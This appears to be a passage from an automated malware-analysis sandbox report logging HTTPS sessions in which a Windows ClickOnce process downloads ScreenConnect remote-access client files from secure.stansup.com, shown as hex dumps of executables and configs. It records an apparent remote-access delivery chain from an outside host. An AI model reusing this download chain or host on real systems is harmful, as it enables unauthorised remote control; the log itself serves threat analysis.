                                                                                                                                                                                                                                                        2024-10-25 17:27:18 UTC16384INData Raw: 73 37 54 2f 44 67 45 48 4a 4c 4d 55 4f 73 70 39 48 48 38 6e 78 77 44 41 31 57 34 53 63 76 6c 62 37 54 56 77 55 71 59 45 58 6b 48 41 49 58 6d 7a 46 6e 6b 6a 31 6d 32 79 44 41 42 45 6f 64 39 71 70 6f 48 62 70 55 72 67 42 67 4b 57 63 67 30 63 34 7a 36 4f 62 38 6b 7a 41 42 43 46 66 6e 39 6a 37 50 2b 58 64 69 69 42 34 78 56 77 35 6d 33 67 2b 50 5a 78 50 43 66 52 41 4d 44 2f 6b 76 61 6b 75 75 47 6a 39 39 2b 36 6b 56 41 43 78 79 76 67 62 58 63 66 78 30 32 75 67 41 45 67 63 6b 5a 54 75 57 37 77 50 34 73 30 4c 68 44 46 37 69 7a 70 76 30 66 41 59 66 64 78 72 45 58 63 69 4d 55 55 4d 41 43 34 58 4d 67 38 65 36 35 75 46 71 6c 51 73 54 2f 62 52 37 6d 32 69 6f 44 6c 37 4f 4d 34 59 67 6f 59 41 43 4b 6c 4e 5a 69 4b 74 34 50 76 51 2b 68 43 6b 31 61 36 6e 32 53 49 53 73 41
                                                                                                                                                                                                                                                        Data Ascii: s7T/DgEHJLMUOsp9HH8nxwDA1W4Scvlb7TVwUqYEXkHAIXmzFnkj1m2yDABEod9qpoHbpUrgBgKWcg0c4z6Ob8kzABCFfn9j7P+XdiiB4xVw5m3g+PZxPCfRAMD/kvakuuGj99+6kVACxyvgbXcfx02ugAEgckZTuW7wP4s0LhDF7izpv0fAYfdxrEXciMUUMAC4XMg8e65uFqlQsT/bR7m2ioDl7OM4YgoYACKlNZiKt4PvQ+hCk1a6n2SISsA
                                                                                                                                                                                                                                                        2024-10-25 17:27:18 UTC3791INData Raw: 62 63 41 41 43 4f 42 36 74 69 49 74 61 41 4d 47 51 41 44 6e 6e 38 59 78 68 6d 33 41 54 78 78 52 41 41 48 73 43 6e 79 33 31 56 37 2b 7a 6d 73 44 42 6b 41 41 35 37 6f 43 32 77 59 4d 67 41 41 65 77 7a 53 4f 56 46 6f 75 39 67 4a 34 58 78 63 53 41 41 49 34 31 30 44 4b 70 66 67 32 34 4b 64 4f 4b 49 41 41 31 6f 71 55 6d 4d 61 78 33 77 76 67 78 61 67 41 66 75 47 45 41 67 68 67 74 69 77 6a 42 45 41 41 31 2b 34 4b 50 4e 38 4c 34 4e 57 6f 41 48 37 6b 68 41 49 49 59 47 5a 32 4d 69 38 6a 74 41 73 4a 51 41 42 7a 61 61 39 51 46 39 4b 43 58 55 67 41 43 4f 42 63 30 7a 6a 47 73 49 78 77 7a 51 45 46 45 4d 41 6b 70 6e 47 4d 59 52 6d 68 49 6d 67 41 41 55 7a 71 43 6a 79 47 4c 69 52 46 30 41 41 43 6d 4e 51 56 65 41 7a 4c 43 46 38 36 6f 41 41 43 6d 4d 52 41 79 76 67 75 4a 45 58
                                                                                                                                                                                                                                                        Data Ascii: bcAACOB6tiItaAMGQADnn8Yxhm3ATxxRAAHsCny31V7+zmsDBkAA57oC2wYMgAAewzSOVFou9gJ4XxcSAAI410DKpfg24KdOKIAA1oqUmMax3wvgxagAfuGEAghgtiwjBEAA1+4KPN8L4NWoAH7khAIIYGZ2Mi8jtAsJQABzaa9QF9KCXUgACOBc0zjGsIxwzQEFEMAkpnGMYRmhImgAAUzqCjyGLiRF0AACmNQVeAzLCF86oAACmMRAyvguJEX


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        1192.168.2.94971379.110.49.1854431556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:19 UTC100OUTGET /Bin/ScreenConnect.Client.manifest HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        2024-10-25 17:27:19 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 17858
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:19 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:19 UTC16169INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
                                                                                                                                                                                                                                                        2024-10-25 17:27:19 UTC1689INData Raw: 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d 4b 46 2b 77 63 38 36 4c 4a 69 55 47 73 6f 50 55 58 50 59 56 47 55 7a 74 59 75 42 65 4d 2f 4c 6f 36 4f 77 4b 70 37 41 44 4b 35 47 79 4e 6e 6d 2b 39 36 30 49 48 6e 57 6d 5a 63 79 37 34 30 68 51 38 33 65 52 47 76 37 62 55 4b 4a 47 79 47 46 59 6d 50 56 38 41 68 59 38 67 79 69 74 4f 59 62 73 31 4c 63 4e 55 39 44 34 52 2b 5a 31 4d 49 33 73 4d 4a 4e 32 46 4b 5a 62 53 31 31 30 59 55 30 2f 45 70 46 32 33 72 39
                                                                                                                                                                                                                                                        Data Ascii: ufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipmKF+wc86LJiUGsoPUXPYVGUztYuBeM/Lo6OwKp7ADK5GyNnm+960IHnWmZcy740hQ83eRGv7bUKJGyGFYmPV8AhY8gyitOYbs1LcNU9D4R+Z1MI3sMJN2FKZbS110YU0/EpF23r9


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        2192.168.2.94972379.110.49.1854431556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:25 UTC126OUTGET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        2024-10-25 17:27:25 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 95520
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:24 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:25 UTC16169INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
                                                                                                                                                                                                                                                        2024-10-25 17:27:25 UTC16384INData Raw: 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e4 d0 40 00 5e 5d c3 55 8b ec 56 68 90 dd 40 00 68 88 dd 40 00 68 90 dd 40 00 6a 03 e8 4a fe ff ff 83 c4 10 8b f0 ff 75 0c ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e8 d0 40 00 5e 5d c3 55 8b ec 56 68 a4 dd 40 00 68 9c dd 40 00 68 a4 dd 40 00 6a 04 e8 0c fe ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 88 d1 40 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 60 d0 40 00 5e 5d c3 56 e8 56 ed ff ff 8b 70 04 85 f6 74 0a 8b ce ff 15 88 d1 40 00 ff d6 e8 de 15 00 00 cc 55 8b ec 8b 45 10 8b 4d 08 81 78 04 80 00 00 00 7f 06 0f be 41 08 5d c3 8b 41 08 5d c3 55 8b ec 8b 45 08 8b 4d 10 89 48 08 5d c3 53 51 bb 30 40 41 00 e9 0f 00 00 00 cc cc cc cc 53 51 bb 30 40 41 00 8b
                                                                                                                                                                                                                                                        Data Ascii: t@@^]UVh@h@h@jJuut@@^]UVh@h@h@jtuuu@uu`@^]VVpt@UEMxA]A]UEMH]SQ0@ASQ0@A
                                                                                                                                                                                                                                                        2024-10-25 17:27:25 UTC16384INData Raw: 01 8b 88 80 00 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 38 46 41 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 48 46 41 00 74 65 8b 46 7c 85 c0 74 5e 83 38 00 75 59 8b 86 84 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 30 d9 ff ff ff b6 88 00 00 00 e8 28 fb ff ff 59 59 8b 86 80 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 0e d9 ff ff ff b6 88 00 00 00 e8 04 fc ff ff 59 59 ff 76 7c e8 f9 d8 ff ff ff b6 88 00 00 00 e8 ee d8 ff ff 59 59 8b 86 8c 00 00 00 85 c0 74 45 83 38 00 75 40 8b 86 90 00 00 00 2d fe 00 00 00 50 e8 cc d8 ff ff 8b 86
                                                                                                                                                                                                                                                        Data Ascii: ttVjH(^y8FAttytQtuNY^]UQSVuWtl=HFAteF|t^8uYt8uP0(YYt8uPYYv|YYtE8u@-P
                                                                                                                                                                                                                                                        2024-10-25 17:27:26 UTC16384INData Raw: 72 09 8b 48 08 03 ce 3b f9 72 0a 42 83 c0 28 3b d3 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 20 2e 41 00 68 80 36 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 04 40 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 7c 00 00 00 83 c4 04 85 c0 74 54 8b 45 08 2d 00 00 40 00 50 68 00 00 40 00 e8 52 ff ff ff 83 c4 08 85 c0 74 3a 8b 40 24 c1 e8 1f f7 d0 83 e0 01 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 8b 45 08 b9 4d 5a 00 00 66 39 08 75 1d 8b 48 3c 03 c8 81 39 50
                                                                                                                                                                                                                                                        Data Ascii: rH;rB(;r3_^[]Ujh .Ah6@dPSVW@A1E3PEdeEh@|tTE-@Ph@Rt:@$EMdY_^[]E38eE3MdY_^[]UEMZf9uH<9P
                                                                                                                                                                                                                                                        2024-10-25 17:27:26 UTC16384INData Raw: 00 65 00 2d 00 61 00 74 00 00 00 64 00 65 00 2d 00 63 00 68 00 00 00 64 00 65 00 2d 00 64 00 65 00 00 00 64 00 65 00 2d 00 6c 00 69 00 00 00 64 00 65 00 2d 00 6c 00 75 00 00 00 64 00 69 00 76 00 2d 00 6d 00 76 00 00 00 00 00 65 00 6c 00 2d 00 67 00 72 00 00 00 65 00 6e 00 2d 00 61 00 75 00 00 00 65 00 6e 00 2d 00 62 00 7a 00 00 00 65 00 6e 00 2d 00 63 00 61 00 00 00 65 00 6e 00 2d 00 63 00 62 00 00 00 65 00 6e 00 2d 00 67 00 62 00 00 00 65 00 6e 00 2d 00 69 00 65 00 00 00 65 00 6e 00 2d 00 6a 00 6d 00 00 00 65 00 6e 00 2d 00 6e 00 7a 00 00 00 65 00 6e 00 2d 00 70 00 68 00 00 00 65 00 6e 00 2d 00 74 00 74 00 00 00 65 00 6e 00 2d 00 75 00 73 00 00 00 65 00 6e 00 2d 00 7a 00 61 00 00 00 65 00 6e 00 2d 00 7a 00 77 00 00 00 65 00 73 00 2d 00 61 00 72 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: e-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ar
                                                                                                                                                                                                                                                        2024-10-25 17:27:26 UTC13815INData Raw: 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e 88 3e 93 3e 9b 3e a6 3e ac 3e b7 3e bd 3e cb 3e d4 3e d9 3e e6 3e eb 3e f8 3e 06 3f 0d 3f 15 3f 2e 3f 40 3f 4c 3f 54 3f 6c 3f 91 3f a2 3f ab 3f f2 3f 00 60 00 00 18 01 00 00 26 30 4d 30 67 30 be 30 cb 30 d6 30 e0 30 e6 30 fa 30 06 31 7f 31 88 31 b4 31 bd 31 c5 31 e2 31 07 32 19 32 35 32 59 32 74 32 7f 32 25 33 d8 33 e1 33 e9 33 04 35 0a 35 1c 35 2f 35 7f 35 b0 35 e0 35 2b 36 27 37 3b 37
                                                                                                                                                                                                                                                        Data Ascii: 3033333444(414B4T4o44444/595?5E555557%8*8P9h9999999999O::;p;{;;;,<<<W======>>*>]>l>q>>>>>>>>>>>>>>>???.?@?L?T?l?????`&0M0g000000011111112252Y2t22%3333555/5555+6'7;7


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        3192.168.2.94972479.110.49.1854431556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:27 UTC134OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        2024-10-25 17:27:27 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 61216
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:26 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:27 UTC16169INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8c 50 0f bc 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 06 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 7f 7c 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP"0 @ |@
                                                                                                                                                                                                                                                        2024-10-25 17:27:27 UTC16384INData Raw: 00 01 00 93 0e 06 00 de 10 22 0a 06 00 60 10 22 0a 06 00 42 26 7b 0e 06 00 e9 1d 68 0e 06 00 31 0f 46 00 06 00 f3 1a 9d 0e 06 00 53 1f a1 0e 06 00 79 27 a6 0e 06 00 84 18 22 0a 36 00 6d 08 aa 0e 16 00 9b 00 af 0e 16 00 b4 00 af 0e 16 00 29 03 af 0e 36 00 6d 08 b9 0e 16 00 37 01 af 0e 06 00 bf 1c be 0e 16 00 a8 1a c3 0e 36 00 6d 08 d0 0e 16 00 25 00 d5 0e 16 00 36 19 87 0e 36 00 6d 08 e7 0e 16 00 ff 07 ec 0e 16 00 36 08 f7 0e 06 00 0f 2f 01 0f 06 00 51 20 57 0e 06 00 c6 19 06 0f 06 00 d8 19 06 0f 06 00 70 19 0b 0f 16 00 a8 1a c3 0e 36 00 6d 08 10 0f 16 00 e7 00 15 0f 16 00 46 03 1e 0f 16 00 d4 05 29 0f 16 00 c1 06 34 0f 16 00 6b 07 34 0f 16 00 73 03 49 0f 16 00 83 01 54 0f 16 00 d5 03 5f 0f 36 00 6d 08 cb 0a 16 00 be 01 c2 0a 16 00 f9 03 c2 0a 16 00 19 06
                                                                                                                                                                                                                                                        Data Ascii: "`"B&{h1FSy'"6m)6m76m%66m6/Q Wp6mF)4k4sIT_6m
                                                                                                                                                                                                                                                        2024-10-25 17:27:27 UTC16384INData Raw: 68 72 65 73 68 6f 6c 64 4c 61 62 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 61 64 64 5f 4d 6f 75 73 65 57 68 65 65 6c 00 50 6f 70 75 6c 61 74 65 50 61 6e 65 6c 00 65 6d 70 74 79 52 65 73 75 6c 74 73 50 61 6e 65 6c 00 72 65 73 75 6c 74 73 50 61 6e 65 6c 00 70 61 6e 65 6c 00 53 65 6c 65 63 74 41 6c 6c 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 00 73 65 74 5f 41 75 74 6f 53 63 72 6f 6c 6c 00 41 73 73 65 72 74 4e 6f 6e 4e 75 6c 6c 00 67 65 74 5f 43 6f 6e 74 72 6f 6c 00 53 63 72 6f 6c 6c 61 62 6c 65 43 6f 6e 74 72 6f 6c 00 63 6f 6e 74 72 6f 6c 00 67 65 74 5f 4c 50 61 72 61 6d 00 67 65 74 5f 57 50 61 72 61 6d 00 50 72 6f 67 72 61 6d 00 67 65 74 5f 49 74 65 6d 00 54
                                                                                                                                                                                                                                                        Data Ascii: hresholdLabelSystem.ComponentModeladd_MouseWheelPopulatePanelemptyResultsPanelresultsPanelpanelSelectAllScreenConnect.WindowsBackstageShellset_AutoScrollAssertNonNullget_ControlScrollableControlcontrolget_LParamget_WParamProgramget_ItemT
                                                                                                                                                                                                                                                        2024-10-25 17:27:28 UTC12279INData Raw: 00 6e 00 65 00 63 00 74 00 2e 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 3c 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 00 00 3c 00 0c 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 33 00 2e 00 38 00 39 00 33 00 36 00 00 00 40 00 0c 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 33 00 2e 00 38 00 39 00 33 00 36 00 00 00 30 e4 00 00 ea 01 00 00
                                                                                                                                                                                                                                                        Data Ascii: nect.WindowsBackstageShell.exe<ProductNameScreenConnect<ProductVersion24.2.3.8936@Assembly Version24.2.3.89360


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        4192.168.2.94972579.110.49.1854431556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:28 UTC114OUTGET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        2024-10-25 17:27:29 UTC213INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:28 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:29 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        5192.168.2.94972779.110.49.1854431556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:30 UTC133OUTGET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        2024-10-25 17:27:30 UTC213INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:29 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:30 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
